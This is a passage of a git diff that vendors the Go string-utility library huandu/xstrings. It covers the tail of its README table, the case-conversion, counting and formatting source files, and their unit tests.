+| [FirstRuneToUpper](https://godoc.org/github.com/huandu/xstrings#FirstRuneToUpper) | `String#capitalize` in Ruby; `ucfirst` in PHP or Perl | [#15](https://github.com/huandu/xstrings/issues/15) |
+| [Insert](https://godoc.org/github.com/huandu/xstrings#Insert) | `String#insert` in Ruby | [#18](https://github.com/huandu/xstrings/issues/18) |
+| [LastPartition](https://godoc.org/github.com/huandu/xstrings#LastPartition) | `str.rpartition` in Python; `String#rpartition` in Ruby | [#19](https://github.com/huandu/xstrings/issues/19) |
+| [LeftJustify](https://godoc.org/github.com/huandu/xstrings#LeftJustify) | `str.ljust` in Python; `String#ljust` in Ruby | [#28](https://github.com/huandu/xstrings/issues/28) |
+| [Len](https://godoc.org/github.com/huandu/xstrings#Len) | `mb_strlen` in PHP | [#23](https://github.com/huandu/xstrings/issues/23) |
+| [Partition](https://godoc.org/github.com/huandu/xstrings#Partition) | `str.partition` in Python; `String#partition` in Ruby | [#10](https://github.com/huandu/xstrings/issues/10) |
+| [Reverse](https://godoc.org/github.com/huandu/xstrings#Reverse) | `String#reverse` in Ruby; `strrev` in PHP; `reverse` in Perl | [#7](https://github.com/huandu/xstrings/issues/7) |
+| [RightJustify](https://godoc.org/github.com/huandu/xstrings#RightJustify) | `str.rjust` in Python; `String#rjust` in Ruby | [#29](https://github.com/huandu/xstrings/issues/29) |
+| [RuneWidth](https://godoc.org/github.com/huandu/xstrings#RuneWidth) | - | [#27](https://github.com/huandu/xstrings/issues/27) |
+| [Scrub](https://godoc.org/github.com/huandu/xstrings#Scrub) | `String#scrub` in Ruby | [#20](https://github.com/huandu/xstrings/issues/20) |
+| [Shuffle](https://godoc.org/github.com/huandu/xstrings#Shuffle) | `str_shuffle` in PHP | [#13](https://github.com/huandu/xstrings/issues/13) |
+| [ShuffleSource](https://godoc.org/github.com/huandu/xstrings#ShuffleSource) | `str_shuffle` in PHP | [#13](https://github.com/huandu/xstrings/issues/13) |
+| [Slice](https://godoc.org/github.com/huandu/xstrings#Slice) | `mb_substr` in PHP | [#9](https://github.com/huandu/xstrings/issues/9) |
+| [Squeeze](https://godoc.org/github.com/huandu/xstrings#Squeeze) | `String#squeeze` in Ruby | [#11](https://github.com/huandu/xstrings/issues/11) |
+| [Successor](https://godoc.org/github.com/huandu/xstrings#Successor) | `String#succ` or `String#next` in Ruby | [#22](https://github.com/huandu/xstrings/issues/22) |
+| [SwapCase](https://godoc.org/github.com/huandu/xstrings#SwapCase) | `str.swapcase` in Python; `String#swapcase` in Ruby | [#12](https://github.com/huandu/xstrings/issues/12) |
+| [ToCamelCase](https://godoc.org/github.com/huandu/xstrings#ToCamelCase) | `String#camelize` in RoR | [#1](https://github.com/huandu/xstrings/issues/1) |
+| [ToSnakeCase](https://godoc.org/github.com/huandu/xstrings#ToSnakeCase) | `String#underscore` in RoR | [#1](https://github.com/huandu/xstrings/issues/1) |
+| [Translate](https://godoc.org/github.com/huandu/xstrings#Translate) | `str.translate` in Python; `String#tr` in Ruby; `strtr` in PHP; `tr///` in Perl | [#21](https://github.com/huandu/xstrings/issues/21) |
+| [Width](https://godoc.org/github.com/huandu/xstrings#Width) | `mb_strwidth` in PHP | [#26](https://github.com/huandu/xstrings/issues/26) |
+| [WordCount](https://godoc.org/github.com/huandu/xstrings#WordCount) | `str_word_count` in PHP | [#14](https://github.com/huandu/xstrings/issues/14) |
+| [WordSplit](https://godoc.org/github.com/huandu/xstrings#WordSplit) | - | [#14](https://github.com/huandu/xstrings/issues/14) |
+
+### Package `strings` functions ###
+
+*Keep this table sorted by Function in ascending order.*
+
+| Function | Friends |
+| -------- | ------- |
+| [Contains](http://golang.org/pkg/strings/#Contains) | `String#include?` in Ruby |
+| [ContainsAny](http://golang.org/pkg/strings/#ContainsAny) | - |
+| [ContainsRune](http://golang.org/pkg/strings/#ContainsRune) | - |
+| [Count](http://golang.org/pkg/strings/#Count) | `str.count` in Python; `substr_count` in PHP |
+| [EqualFold](http://golang.org/pkg/strings/#EqualFold) | `stricmp` in PHP; `String#casecmp` in Ruby |
+| [Fields](http://golang.org/pkg/strings/#Fields) | `str.split` in Python; `split` in Perl; `String#split` in Ruby |
+| [FieldsFunc](http://golang.org/pkg/strings/#FieldsFunc) | - |
+| [HasPrefix](http://golang.org/pkg/strings/#HasPrefix) | `str.startswith` in Python; `String#start_with?` in Ruby |
+| [HasSuffix](http://golang.org/pkg/strings/#HasSuffix) | `str.endswith` in Python; `String#end_with?` in Ruby |
+| [Index](http://golang.org/pkg/strings/#Index) | `str.index` in Python; `String#index` in Ruby; `strpos` in PHP; `index` in Perl |
+| [IndexAny](http://golang.org/pkg/strings/#IndexAny) | - |
+| [IndexByte](http://golang.org/pkg/strings/#IndexByte) | - |
+| [IndexFunc](http://golang.org/pkg/strings/#IndexFunc) | - |
+| [IndexRune](http://golang.org/pkg/strings/#IndexRune) | - |
+| [Join](http://golang.org/pkg/strings/#Join) | `str.join` in Python; `Array#join` in Ruby; `implode` in PHP; `join` in Perl |
+| [LastIndex](http://golang.org/pkg/strings/#LastIndex) | `str.rindex` in Python; `String#rindex`; `strrpos` in PHP; `rindex` in Perl |
+| [LastIndexAny](http://golang.org/pkg/strings/#LastIndexAny) | - |
+| [LastIndexFunc](http://golang.org/pkg/strings/#LastIndexFunc) | - |
+| [Map](http://golang.org/pkg/strings/#Map) | `String#each_codepoint` in Ruby |
+| [Repeat](http://golang.org/pkg/strings/#Repeat) | operator `*` in Python and Ruby; `str_repeat` in PHP |
+| [Replace](http://golang.org/pkg/strings/#Replace) | `str.replace` in Python; `String#sub` in Ruby; `str_replace` in PHP |
+| [Split](http://golang.org/pkg/strings/#Split) | `str.split` in Python; `String#split` in Ruby; `explode` in PHP; `split` in Perl |
+| [SplitAfter](http://golang.org/pkg/strings/#SplitAfter) | - |
+| [SplitAfterN](http://golang.org/pkg/strings/#SplitAfterN) | - |
+| [SplitN](http://golang.org/pkg/strings/#SplitN) | `str.split` in Python; `String#split` in Ruby; `explode` in PHP; `split` in Perl |
+| [Title](http://golang.org/pkg/strings/#Title) | `str.title` in Python |
+| [ToLower](http://golang.org/pkg/strings/#ToLower) | `str.lower` in Python; `String#downcase` in Ruby; `strtolower` in PHP; `lc` in Perl |
+| [ToLowerSpecial](http://golang.org/pkg/strings/#ToLowerSpecial) | - |
+| [ToTitle](http://golang.org/pkg/strings/#ToTitle) | - |
+| [ToTitleSpecial](http://golang.org/pkg/strings/#ToTitleSpecial) | - |
+| [ToUpper](http://golang.org/pkg/strings/#ToUpper) | `str.upper` in Python; `String#upcase` in Ruby; `strtoupper` in PHP; `uc` in Perl |
+| [ToUpperSpecial](http://golang.org/pkg/strings/#ToUpperSpecial) | - |
+| [Trim](http://golang.org/pkg/strings/#Trim) | `str.strip` in Python; `String#strip` in Ruby; `trim` in PHP |
+| [TrimFunc](http://golang.org/pkg/strings/#TrimFunc) | - |
+| [TrimLeft](http://golang.org/pkg/strings/#TrimLeft) | `str.lstrip` in Python; `String#lstrip` in Ruby; `ltrim` in PHP |
+| [TrimLeftFunc](http://golang.org/pkg/strings/#TrimLeftFunc) | - |
+| [TrimPrefix](http://golang.org/pkg/strings/#TrimPrefix) | - |
+| [TrimRight](http://golang.org/pkg/strings/#TrimRight) | `str.rstrip` in Python; `String#rstrip` in Ruby; `rtrim` in PHP |
+| [TrimRightFunc](http://golang.org/pkg/strings/#TrimRightFunc) | - |
+| [TrimSpace](http://golang.org/pkg/strings/#TrimSpace) | `str.strip` in Python; `String#strip` in Ruby; `trim` in PHP |
+| [TrimSuffix](http://golang.org/pkg/strings/#TrimSuffix) | `String#chomp` in Ruby; `chomp` in Perl |
+
+## License ##
+
+This library is licensed under MIT license. See LICENSE for details.
diff --git a/vendor/github.com/huandu/xstrings/common.go b/vendor/github.com/huandu/xstrings/common.go
new file mode 100644
index 0000000000..2aff57aab4
--- /dev/null
+++ b/vendor/github.com/huandu/xstrings/common.go
@@ -0,0 +1,25 @@
+// Copyright 2015 Huan Du. All rights reserved.
+// Licensed under the MIT license that can be found in the LICENSE file.
+
+package xstrings
+
+import (
+	"bytes"
+)
+
+const bufferMaxInitGrowSize = 2048
+
+// Lazy initialize a buffer.
+func allocBuffer(orig, cur string) *bytes.Buffer {
+	output := &bytes.Buffer{}
+	maxSize := len(orig) * 4
+
+	// Avoid to reserve too much memory at once.
+	if maxSize > bufferMaxInitGrowSize {
+		maxSize = bufferMaxInitGrowSize
+	}
+
+	output.Grow(maxSize)
+	output.WriteString(orig[:len(orig)-len(cur)])
+	return output
+}
diff --git a/vendor/github.com/huandu/xstrings/convert.go b/vendor/github.com/huandu/xstrings/convert.go
new file mode 100644
index 0000000000..783e73b673
--- /dev/null
+++ b/vendor/github.com/huandu/xstrings/convert.go
@@ -0,0 +1,364 @@
+// Copyright 2015 Huan Du. All rights reserved.
+// Licensed under the MIT license that can be found in the LICENSE file.
+
+package xstrings
+
+import (
+	"bytes"
+	"math/rand"
+	"unicode"
+	"unicode/utf8"
+)
+
+// ToCamelCase can convert all lower case characters behind underscores
+// to upper case character.
+// Underscore character will be removed in result except following cases.
+//     * More than 1 underscore.
+//           "a__b" => "A_B"
+//     * At the beginning of string.
+//           "_a" => "_A"
+//     * At the end of string.
+//           "ab_" => "Ab_"
+func ToCamelCase(str string) string {
+	if len(str) == 0 {
+		return ""
+	}
+
+	buf := &bytes.Buffer{}
+	var r0, r1 rune
+	var size int
+
+	// leading '_' will appear in output.
+	for len(str) > 0 {
+		r0, size = utf8.DecodeRuneInString(str)
+		str = str[size:]
+
+		if r0 != '_' {
+			break
+		}
+
+		buf.WriteRune(r0)
+	}
+
+	if len(str) == 0 {
+		return buf.String()
+	}
+	
+	r0 = unicode.ToUpper(r0)
+
+	for len(str) > 0 {
+		r1 = r0
+		r0, size = utf8.DecodeRuneInString(str)
+		str = str[size:]
+
+		if r1 == '_' && r0 == '_' {
+			buf.WriteRune(r1)
+			continue
+		}
+
+		if r1 == '_' {
+			r0 = unicode.ToUpper(r0)
+		} else {
+			r0 = unicode.ToLower(r0)
+		}
+
+		if r1 != '_' {
+			buf.WriteRune(r1)
+		}
+	}
+
+	buf.WriteRune(r0)
+	return buf.String()
+}
+
+// ToSnakeCase can convert all upper case characters in a string to
+// underscore format.
+//
+// Some samples.
+//     "FirstName"  => "first_name"
+//     "HTTPServer" => "http_server"
+//     "NoHTTPS"    => "no_https"
+//     "GO_PATH"    => "go_path"
+//     "GO PATH"    => "go_path"      // space is converted to underscore.
+//     "GO-PATH"    => "go_path"      // hyphen is converted to underscore.
+func ToSnakeCase(str string) string {
+	if len(str) == 0 {
+		return ""
+	}
+
+	buf := &bytes.Buffer{}
+	var prev, r0, r1 rune
+	var size int
+
+	r0 = '_'
+
+	for len(str) > 0 {
+		prev = r0
+		r0, size = utf8.DecodeRuneInString(str)
+		str = str[size:]
+
+		switch {
+		case r0 == utf8.RuneError:
+			buf.WriteByte(byte(str[0]))
+
+		case unicode.IsUpper(r0):
+			if prev != '_' {
+				buf.WriteRune('_')
+			}
+
+			buf.WriteRune(unicode.ToLower(r0))
+
+			if len(str) == 0 {
+				break
+			}
+
+			r0, size = utf8.DecodeRuneInString(str)
+			str = str[size:]
+
+			if !unicode.IsUpper(r0) {
+				buf.WriteRune(r0)
+				break
+			}
+
+			// find next non-upper-case character and insert `_` properly.
+			// it's designed to convert `HTTPServer` to `http_server`.
+			// if there are more than 2 adjacent upper case characters in a word,
+			// treat them as an abbreviation plus a normal word.
+			for len(str) > 0 {
+				r1 = r0
+				r0, size = utf8.DecodeRuneInString(str)
+				str = str[size:]
+
+				if r0 == utf8.RuneError {
+					buf.WriteRune(unicode.ToLower(r1))
+					buf.WriteByte(byte(str[0]))
+					break
+				}
+
+				if !unicode.IsUpper(r0) {
+					if r0 == '_' || r0 == ' ' || r0 == '-' {
+						r0 = '_'
+
+						buf.WriteRune(unicode.ToLower(r1))
+					} else {
+						buf.WriteRune('_')
+						buf.WriteRune(unicode.ToLower(r1))
+						buf.WriteRune(r0)
+					}
+
+					break
+				}
+
+				buf.WriteRune(unicode.ToLower(r1))
+			}
+
+			if len(str) == 0 || r0 == '_' {
+				buf.WriteRune(unicode.ToLower(r0))
+				break
+			}
+
+		default:
+			if r0 == ' ' || r0 == '-' {
+				r0 = '_'
+			}
+
+			buf.WriteRune(r0)
+		}
+	}
+
+	return buf.String()
+}
+
+// SwapCase will swap characters case from upper to lower or lower to upper.
+func SwapCase(str string) string {
+	var r rune
+	var size int
+
+	buf := &bytes.Buffer{}
+
+	for len(str) > 0 {
+		r, size = utf8.DecodeRuneInString(str)
+
+		switch {
+		case unicode.IsUpper(r):
+			buf.WriteRune(unicode.ToLower(r))
+
+		case unicode.IsLower(r):
+			buf.WriteRune(unicode.ToUpper(r))
+
+		default:
+			buf.WriteRune(r)
+		}
+
+		str = str[size:]
+	}
+
+	return buf.String()
+}
+
+// FirstRuneToUpper converts first rune to upper case if necessary.
+func FirstRuneToUpper(str string) string {
+	if str == "" {
+		return str
+	}
+
+	r, size := utf8.DecodeRuneInString(str)
+
+	if !unicode.IsLower(r) {
+		return str
+	}
+
+	buf := &bytes.Buffer{}
+	buf.WriteRune(unicode.ToUpper(r))
+	buf.WriteString(str[size:])
+	return buf.String()
+}
+
+// FirstRuneToLower converts first rune to lower case if necessary.
+func FirstRuneToLower(str string) string {
+	if str == "" {
+		return str
+	}
+
+	r, size := utf8.DecodeRuneInString(str)
+
+	if !unicode.IsUpper(r) {
+		return str
+	}
+
+	buf := &bytes.Buffer{}
+	buf.WriteRune(unicode.ToLower(r))
+	buf.WriteString(str[size:])
+	return buf.String()
+}
+
+// Shuffle randomizes runes in a string and returns the result.
+// It uses default random source in `math/rand`.
+func Shuffle(str string) string {
+	if str == "" {
+		return str
+	}
+
+	runes := []rune(str)
+	index := 0
+
+	for i := len(runes) - 1; i > 0; i-- {
+		index = rand.Intn(i + 1)
+
+		if i != index {
+			runes[i], runes[index] = runes[index], runes[i]
+		}
+	}
+
+	return string(runes)
+}
+
+// ShuffleSource randomizes runes in a string with given random source.
+func ShuffleSource(str string, src rand.Source) string {
+	if str == "" {
+		return str
+	}
+
+	runes := []rune(str)
+	index := 0
+	r := rand.New(src)
+
+	for i := len(runes) - 1; i > 0; i-- {
+		index = r.Intn(i + 1)
+
+		if i != index {
+			runes[i], runes[index] = runes[index], runes[i]
+		}
+	}
+
+	return string(runes)
+}
+
+// Successor returns the successor to string.
+//
+// If there is one alphanumeric rune is found in string, increase the rune by 1.
+// If increment generates a "carry", the rune to the left of it is incremented.
+// This process repeats until there is no carry, adding an additional rune if necessary.
+//
+// If there is no alphanumeric rune, the rightmost rune will be increased by 1
+// regardless whether the result is a valid rune or not.
+//
+// Only following characters are alphanumeric.
+//     * a - z
+//     * A - Z
+//     * 0 - 9
+//
+// Samples (borrowed from ruby's String#succ document):
+//     "abcd"      => "abce"
+//     "THX1138"   => "THX1139"
+//     "<<koala>>" => "<<koalb>>"
+//     "1999zzz"   => "2000aaa"
+//     "ZZZ9999"   => "AAAA0000"
+//     "***"       => "**+"
+func Successor(str string) string {
+	if str == "" {
+		return str
+	}
+
+	var r rune
+	var i int
+	carry := ' '
+	runes := []rune(str)
+	l := len(runes)
+	lastAlphanumeric := l
+
+	for i = l - 1; i >= 0; i-- {
+		r = runes[i]
+
+		if ('a' <= r && r <= 'y') ||
+			('A' <= r && r <= 'Y') ||
+			('0' <= r && r <= '8') {
+			runes[i]++
+			carry = ' '
+			lastAlphanumeric = i
+			break
+		}
+
+		switch r {
+		case 'z':
+			runes[i] = 'a'
+			carry = 'a'
+			lastAlphanumeric = i
+
+		case 'Z':
+			runes[i] = 'A'
+			carry = 'A'
+			lastAlphanumeric = i
+
+		case '9':
+			runes[i] = '0'
+			carry = '0'
+			lastAlphanumeric = i
+		}
+	}
+
+	// Needs to add one character for carry.
+	if i < 0 && carry != ' ' {
+		buf := &bytes.Buffer{}
+		buf.Grow(l + 4) // Reserve enough space for write.
+
+		if lastAlphanumeric != 0 {
+			buf.WriteString(str[:lastAlphanumeric])
+		}
+
+		buf.WriteRune(carry)
+
+		for _, r = range runes[lastAlphanumeric:] {
+			buf.WriteRune(r)
+		}
+
+		return buf.String()
+	}
+
+	// No alphanumeric character. Simply increase last rune's value.
+	if lastAlphanumeric == l {
+		runes[l-1]++
+	}
+
+	return string(runes)
+}
diff --git a/vendor/github.com/huandu/xstrings/convert_test.go b/vendor/github.com/huandu/xstrings/convert_test.go
new file mode 100644
index 0000000000..30707a98a8
--- /dev/null
+++ b/vendor/github.com/huandu/xstrings/convert_test.go
@@ -0,0 +1,165 @@
+// Copyright 2015 Huan Du. All rights reserved.
+// Licensed under the MIT license that can be found in the LICENSE file.
+
+package xstrings
+
+import (
+	"sort"
+	"strings"
+	"testing"
+)
+
+func TestToSnakeCase(t *testing.T) {
+	runTestCases(t, ToSnakeCase, _M{
+		"HTTPServer":         "http_server",
+		"_camelCase":         "_camel_case",
+		"NoHTTPS":            "no_https",
+		"Wi_thF":             "wi_th_f",
+		"_AnotherTES_TCaseP": "_another_tes_t_case_p",
+		"ALL":                "all",
+		"_HELLO_WORLD_":      "_hello_world_",
+		"HELLO_WORLD":        "hello_world",
+		"HELLO____WORLD":     "hello____world",
+		"TW":                 "tw",
+		"_C":                 "_c",
+
+		"  sentence case  ":                                    "__sentence_case__",
+		" Mixed-hyphen case _and SENTENCE_case and UPPER-case": "_mixed_hyphen_case__and_sentence_case_and_upper_case",
+	})
+}
+
+func TestToCamelCase(t *testing.T) {
+	runTestCases(t, ToCamelCase, _M{
+		"http_server":     "HttpServer",
+		"_camel_case":     "_CamelCase",
+		"no_https":        "NoHttps",
+		"_complex__case_": "_Complex_Case_",
+		"all":             "All",
+		"GOLANG_IS_GREAT": "GolangIsGreat",
+		"GOLANG":          "Golang",
+	})
+}
+
+func TestSwapCase(t *testing.T) {
+	runTestCases(t, SwapCase, _M{
+		"swapCase": "SWAPcASE",
+		"Θ~λa云Ξπ":  "θ~ΛA云ξΠ",
+	})
+}
+
+func TestFirstRuneToUpper(t *testing.T) {
+	runTestCases(t, FirstRuneToUpper, _M{
+		"hello, world!": "Hello, world!",
+		"Hello, world!": "Hello, world!",
+		"你好，世界！":        "你好，世界！",
+	})
+}
+
+func TestFirstRuneToLower(t *testing.T) {
+	runTestCases(t, FirstRuneToLower, _M{
+		"hello, world!": "hello, world!",
+		"Hello, world!": "hello, world!",
+		"你好，世界！":        "你好，世界！",
+	})
+}
+
+func TestShuffle(t *testing.T) {
+	// It seems there is no reliable way to test shuffled string.
+	// Runner just make sure shuffled string has the same runes as origin string.
+	runner := func(str string) string {
+		s := Shuffle(str)
+		slice := sort.StringSlice(strings.Split(s, ""))
+		slice.Sort()
+		return strings.Join(slice, "")
+	}
+
+	runTestCases(t, runner, _M{
+		"":            "",
+		"facgbheidjk": "abcdefghijk",
+		"尝试中文":        "中尝文试",
+		"zh英文hun排":    "hhnuz排文英",
+	})
+}
+
+type testShuffleSource int
+
+// A generated random number sequance just for testing.
+var testShuffleTable = []int64{
+	1874068156324778273,
+	3328451335138149956,
+	5263531936693774911,
+	7955079406183515637,
+	2703501726821866378,
+	2740103009342231109,
+	6941261091797652072,
+	1905388747193831650,
+	7981306761429961588,
+	6426100070888298971,
+	4831389563158288344,
+	261049867304784443,
+	1460320609597786623,
+	5600924393587988459,
+	8995016276575641803,
+	732830328053361739,
+	5486140987150761883,
+	545291762129038907,
+	6382800227808658932,
+	2781055864473387780,
+	1598098976185383115,
+	4990765271833742716,
+	5018949295715050020,
+	2568779411109623071,
+	3902890183311134652,
+	4893789450120281907,
+	2338498362660772719,
+	2601737961087659062,
+	7273596521315663110,
+	3337066551442961397,
+	8121576815539813105,
+	2740376916591569721,
+	8249030965139585917,
+	898860202204764712,
+	9010467728050264449,
+	685213522303989579,
+	2050257992909156333,
+	6281838661429879825,
+	2227583514184312746,
+	2873287401706343734,
+}
+
+func (src testShuffleSource) Int63() int64 {
+	n := testShuffleTable[int(src)%len(testShuffleTable)]
+	src++
+	return n
+}
+
+func (src testShuffleSource) Seed(int64) {}
+
+func TestShuffleSource(t *testing.T) {
+	var src testShuffleSource
+	runner := func(str string) string {
+		return ShuffleSource(str, src)
+	}
+
+	runTestCases(t, runner, _M{
+		"":            "",
+		"facgbheidjk": "bakefjgichd",
+		"尝试中文怎么样":     "怎试中样尝么文",
+		"zh英文hun排":    "hh英nzu文排",
+	})
+}
+
+func TestSuccessor(t *testing.T) {
+	runTestCases(t, Successor, _M{
+		"":          "",
+		"abcd":      "abce",
+		"THX1138":   "THX1139",
+		"<<koala>>": "<<koalb>>",
+		"1999zzz":   "2000aaa",
+		"ZZZ9999":   "AAAA0000",
+		"***":       "**+",
+
+		"来点中文试试":               "来点中文试诖",
+		"中cZ英ZZ文zZ混9zZ9杂99进z位": "中dA英AA文aA混0aA0杂00进a位",
+	})
+}
diff --git a/vendor/github.com/huandu/xstrings/count.go b/vendor/github.com/huandu/xstrings/count.go
new file mode 100644
index 0000000000..f96e38703a
--- /dev/null
+++ b/vendor/github.com/huandu/xstrings/count.go
@@ -0,0 +1,120 @@
+// Copyright 2015 Huan Du. All rights reserved.
+// Licensed under the MIT license that can be found in the LICENSE file.
+
+package xstrings
+
+import (
+	"unicode"
+	"unicode/utf8"
+)
+
+// Len returns str's utf8 rune length.
+func Len(str string) int {
+	return utf8.RuneCountInString(str)
+}
+
+// WordCount returns number of words in a string.
+//
+// Word is defined as a locale dependent string containing alphabetic characters,
+// which may also contain but not start with `'` and `-` characters.
+func WordCount(str string) int {
+	var r rune
+	var size, n int
+
+	inWord := false
+
+	for len(str) > 0 {
+		r, size = utf8.DecodeRuneInString(str)
+
+		switch {
+		case isAlphabet(r):
+			if !inWord {
+				inWord = true
+				n++
+			}
+
+		case inWord && (r == '\'' || r == '-'):
+			// Still in word.
+
+		default:
+			inWord = false
+		}
+
+		str = str[size:]
+	}
+
+	return n
+}
+
+const minCJKCharacter = '\u3400'
+
+// Checks r is a letter but not CJK character.
+func isAlphabet(r rune) bool {
+	if !unicode.IsLetter(r) {
+		return false
+	}
+
+	switch {
+	// Quick check for non-CJK character.
+	case r < minCJKCharacter:
+		return true
+
+	// Common CJK characters.
+	case r >= '\u4E00' && r <= '\u9FCC':
+		return false
+
+	// Rare CJK characters.
+	case r >= '\u3400' && r <= '\u4D85':
+		return false
+
+	// Rare and historic CJK characters.
+	case r >= '\U00020000' && r <= '\U0002B81D':
+		return false
+	}
+
+	return true
+}
+
+// Width returns string width in monotype font.
+// Multi-byte characters are usually twice the width of single byte characters.
+//
+// Algorithm comes from `mb_strwidth` in PHP.
+// http://php.net/manual/en/function.mb-strwidth.php
+func Width(str string) int {
+	var r rune
+	var size, n int
+
+	for len(str) > 0 {
+		r, size = utf8.DecodeRuneInString(str)
+		n += RuneWidth(r)
+		str = str[size:]
+	}
+
+	return n
+}
+
+// RuneWidth returns character width in monotype font.
+// Multi-byte characters are usually twice the width of single byte characters.
+//
+// Algorithm comes from `mb_strwidth` in PHP.
+// http://php.net/manual/en/function.mb-strwidth.php
+func RuneWidth(r rune) int {
+	switch {
+	case r == utf8.RuneError || r < '\x20':
+		return 0
+
+	case '\x20' <= r && r < '\u2000':
+		return 1
+
+	case '\u2000' <= r && r < '\uFF61':
+		return 2
+
+	case '\uFF61' <= r && r < '\uFFA0':
+		return 1
+
+	case '\uFFA0' <= r:
+		return 2
+	}
+
+	return 0
+}
diff --git a/vendor/github.com/huandu/xstrings/count_test.go b/vendor/github.com/huandu/xstrings/count_test.go
new file mode 100644
index 0000000000..0500b145fb
--- /dev/null
+++ b/vendor/github.com/huandu/xstrings/count_test.go
@@ -0,0 +1,62 @@
+// Copyright 2015 Huan Du. All rights reserved.
+// Licensed under the MIT license that can be found in the LICENSE file.
+
+package xstrings
+
+import (
+	"fmt"
+	"testing"
+)
+
+func TestLen(t *testing.T) {
+	runner := func(str string) string {
+		return fmt.Sprint(Len(str))
+	}
+
+	runTestCases(t, runner, _M{
+		"abcdef":    "6",
+		"中文":        "2",
+		"中yin文hun排": "9",
+		"":          "0",
+	})
+}
+
+func TestWordCount(t *testing.T) {
+	runner := func(str string) string {
+		return fmt.Sprint(WordCount(str))
+	}
+
+	runTestCases(t, runner, _M{
+		"one word: λ":             "3",
+		"中文":                      "0",
+		"你好，sekai！":               "1",
+		"oh, it's super-fancy!!a": "4",
+		"":        "0",
+		"-":       "0",
+		"it's-'s": "1",
+	})
+}
+
+func TestWidth(t *testing.T) {
+	runner := func(str string) string {
+		return fmt.Sprint(Width(str))
+	}
+
+	runTestCases(t, runner, _M{
+		"abcd\t0123\n7890": "12",
+		"中zh英eng文混排":       "15",
+		"": "0",
+	})
+}
+
+func TestRuneWidth(t *testing.T) {
+	runner := func(str string) string {
+		return fmt.Sprint(RuneWidth([]rune(str)[0]))
+	}
+
+	runTestCases(t, runner, _M{
+		"a":    "1",
+		"中":    "2",
+		"\x11": "0",
+	})
+}
diff --git a/vendor/github.com/huandu/xstrings/doc.go b/vendor/github.com/huandu/xstrings/doc.go
new file mode 100644
index 0000000000..1a6ef069f6
--- /dev/null
+++ b/vendor/github.com/huandu/xstrings/doc.go
@@ -0,0 +1,8 @@
+// Copyright 2015 Huan Du. All rights reserved.
+// Licensed under the MIT license that can be found in the LICENSE file.
+
+// Package xstrings is to provide string algorithms which are useful but not included in `strings` package.
+// See project home page for details. https://github.com/huandu/xstrings
+//
+// Package xstrings assumes all strings are encoded in utf8.
+package xstrings
diff --git a/vendor/github.com/huandu/xstrings/format.go b/vendor/github.com/huandu/xstrings/format.go
new file mode 100644
index 0000000000..2d02df1c04
--- /dev/null
+++ b/vendor/github.com/huandu/xstrings/format.go
@@ -0,0 +1,170 @@
+// Copyright 2015 Huan Du. All rights reserved.
+// Licensed under the MIT license that can be found in the LICENSE file.
+
+package xstrings
+
+import (
+	"bytes"
+	"unicode/utf8"
+)
+
+// ExpandTabs can expand tabs ('\t') rune in str to one or more spaces dpending on
+// current column and tabSize.
+// The column number is reset to zero after each newline ('\n') occurring in the str.
+//
+// ExpandTabs uses RuneWidth to decide rune's width.
+// For example, CJK characters will be treated as two characters.
+//
+// If tabSize <= 0, ExpandTabs panics with error.
+//
+// Samples:
+//     ExpandTabs("a\tbc\tdef\tghij\tk", 4) => "a   bc  def ghij    k"
+//     ExpandTabs("abcdefg\thij\nk\tl", 4)  => "abcdefg hij\nk   l"
+//     ExpandTabs("z中\t文\tw", 4)           => "z中 文  w"
+func ExpandTabs(str string, tabSize int) string {
+	if tabSize <= 0 {
+		panic("tab size must be positive")
+	}
+
+	var r rune
+	var i, size, column, expand int
+	var output *bytes.Buffer
+
+	orig := str
+
+	for len(str) > 0 {
+		r, size = utf8.DecodeRuneInString(str)
+
+		if r == '\t' {
+			expand = tabSize - column%tabSize
+
+			if output == nil {
+				output = allocBuffer(orig, str)
+			}
+
+			for i = 0; i < expand; i++ {
+				output.WriteByte(byte(' '))
+			}
+
+			column += expand
+		} else {
+			if r == '\n' {
+				column = 0
+			} else {
+				column += RuneWidth(r)
+			}
+
+			if output != nil {
+				output.WriteRune(r)
+			}
+		}
+
+		str = str[size:]
+	}
+
+	if output == nil {
+		return orig
+	}
+
+	return output.String()
+}
+
+// LeftJustify returns a string with pad string at right side if str's rune length is smaller than length.
+// If str's rune length is larger than length, str itself will be returned.
+//
+// If pad is an empty string, str will be returned.
+//
+// Samples:
+//     LeftJustify("hello", 4, " ")    => "hello"
+//     LeftJustify("hello", 10, " ")   => "hello     "
+//     LeftJustify("hello", 10, "123") => "hello12312"
+func LeftJustify(str string, length int, pad string) string {
+	l := Len(str)
+
+	if l >= length || pad == "" {
+		return str
+	}
+
+	remains := length - l
+	padLen := Len(pad)
+
+	output := &bytes.Buffer{}
+	output.Grow(len(str) + (remains/padLen+1)*len(pad))
+	output.WriteString(str)
+	writePadString(output, pad, padLen, remains)
+	return output.String()
+}
+
+// RightJustify returns a string with pad string at left side if str's rune length is smaller than length.
+// If str's rune length is larger than length, str itself will be returned.
+//
+// If pad is an empty string, str will be returned.
+//
+// Samples:
+//     RightJustify("hello", 4, " ")    => "hello"
+//     RightJustify("hello", 10, " ")   => "     hello"
+//     RightJustify("hello", 10, "123") => "12312hello"
+func RightJustify(str string, length int, pad string) string {
+	l := Len(str)
+
+	if l >= length || pad == "" {
+		return str
+	}
+
+	remains := length - l
+	padLen := Len(pad)
+
+	output := &bytes.Buffer{}
+	output.Grow(len(str) + (remains/padLen+1)*len(pad))
+	writePadString(output, pad, padLen, remains)
+	output.WriteString(str)
+	return output.String()
+}
+
+// Center returns a string with pad string at both side if str's rune length is smaller than length.
+// If str's rune length is larger than length, str itself will be returned.
+//
+// If pad is an empty string, str will be returned.
+//
+// Samples:
+//     Center("hello", 4, " ")    => "hello"
+//     Center("hello", 10, " ")   => "  hello   "
+//     Center("hello", 10, "123") => "12hello123"
+func Center(str string, length int, pad string) string {
+	l := Len(str)
+
+	if l >= length || pad == "" {
+		return str
+	}
+
+	remains := length - l
+	padLen := Len(pad)
+
+	output := &bytes.Buffer{}
+	output.Grow(len(str) + (remains/padLen+1)*len(pad))
+	writePadString(output, pad, padLen, remains/2)
+	output.WriteString(str)
+	writePadString(output, pad, padLen, (remains+1)/2)
+	return output.String()
+}
+
+func writePadString(output *bytes.Buffer, pad string, padLen, remains int) {
+	var r rune
+	var size int
+
+	repeats := remains / padLen
+
+	for i := 0; i < repeats; i++ {
+		output.WriteString(pad)
+	}
+
+	remains = remains % padLen
+
+	if remains != 0 {
+		for i := 0; i < remains; i++ {
+			r, size = utf8.DecodeRuneInString(pad)
+			output.WriteRune(r)
+			pad = pad[size:]
+		}
+	}
+}
